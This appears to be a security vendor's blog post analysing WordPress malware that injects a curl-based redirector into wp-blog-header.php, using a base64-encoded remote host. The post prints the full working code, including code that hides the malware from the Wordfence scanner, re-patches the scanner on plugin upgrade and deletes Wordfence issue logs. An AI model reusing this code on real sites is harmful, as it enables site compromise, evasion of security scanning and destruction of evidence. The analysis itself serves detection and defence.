We found new intresting malware that infected WordPress and Wordfence Security plugin. This malware filename is random numeric with php extension.
Unlink
When it just executed from remote GET Request, it remove itself at first. So it’s difficult know what happened on server and what case infection to WordPress and Wordfence.
wp-blog-header.php
It modifying WordPress wp-blog-header.php file and add more content to begin of file. It check where user is Website url and what extension of filename and then CURL download/Redirect it.
Url is BASE64 encoded: aHR0cDovL2RvbWZvcnVsdHJhZG9ycy5jb20vPw
BASE64_DECODE: http://domforultradors.com/
Source infected wp-blog-header.php
$e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);
if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) ||
basename($f, ".php") == "index") && in_array(strtok("="), array("", "p", "page_id")) && (empty($_SERVER["HTTP_USER_AGENT"]) ||
(stripos($u = $_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false && stripos($u, "MJ12bot") === false))) {
$at = "base64_" . "decode";
$ch = curl_init($at("aHR0cDovL2RvbWZvcnVsdHJhZG9ycy5jb20vPw==") . "92877f004477c5605f97f9c527d0ec60" . $p);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"])
);
if (isset($_SERVER["HTTP_USER_AGENT"]))
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
if (isset($_SERVER["HTTP_REFERER"]))
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
$ci = "curl_ex" . "ec";
$data = $ci($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if (strlen($data) > 255 && $code == 200) {
echo $data; exit;
} else if ($data && ($code == 301 || $code == 302)) {
header("Location: " . trim($data), true, $code); exit;
}
}
wfScanEngine.php
Next this malware trying modify wfScanEngine.php file:
Orginal
if (!is_array($this->knownFiles)) {
throw new wfScanKnownFilesException("Invalid response from Wordfence servers.");
}
Again it are more content begin of orginal content:
Modified
unset($this->knownFiles["core"]["wp-blog-header.php"],
$this->knownFiles["core"][$file = "wp-admin/includes/class-wp-upgrader.php"],
$this->knownFiles["plugins"]["wp-content/plugins/wordfence/lib/wfScanEngine.php"]);
if (method_exists("wordfenceHash", "wfHash")) {
$hash = @wordfenceHash::wfHash(ABSPATH . $file);
if (count($hash) > 1 && strlen($hash[1]) > 12) {
$this->knownFiles["core"][$file] = strtoupper($hash[1]);
}
}
if (!is_array($this->knownFiles)) {
throw new wfScanKnownFilesException("Invalid response from Wordfence servers.");
}
WordPress class-wp-upgrader.php
Third modification is WordPress class-wp-upgrader.php file modification.
Orginal
//Bombard the calling function will all the info which we've just used. return $this->result;
Modified
//Bombard the calling function will all the info which we've just used.
if ($destination_name == "wordfence" && ($data = file_get_contents($file = $destination . "lib/wfScanEngine.php"))) {
$data = str_replace('if (!is_array($this->knownFiles))', 'unset($this->knownFiles["core"]["wp-blog-header.php"],
$this->knownFiles["core"][$file = "wp-admin/includes/class-wp-upgrader.php"],
$this->knownFiles["plugins"]["wp-content/plugins/wordfence/lib/wfScanEngine.php"]);
if (method_exists("wordfenceHash", "wfHash")) {
$hash = @wordfenceHash::wfHash(ABSPATH . $file);
if (count($hash) > 1 && strlen($hash[1]) > 12) {
$this->knownFiles["core"][$file] = strtoupper($hash[1]);
}
}
if (!is_array($this->knownFiles))', $data, $count);
if ($data && $count) {
file_put_contents($file, $data);
}
}
return $this->result;;
Last modification to database
Final this malware try remove all wp_wfIssues logs from database.
mysqli_query(mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME),
"delete from wp_wfIssues");
Final words
Websites that using Malware Expert – ModSecurity rules are protected against this kind of attacks.
Use Malware Expert – Signatures detect this malware from files for FREE!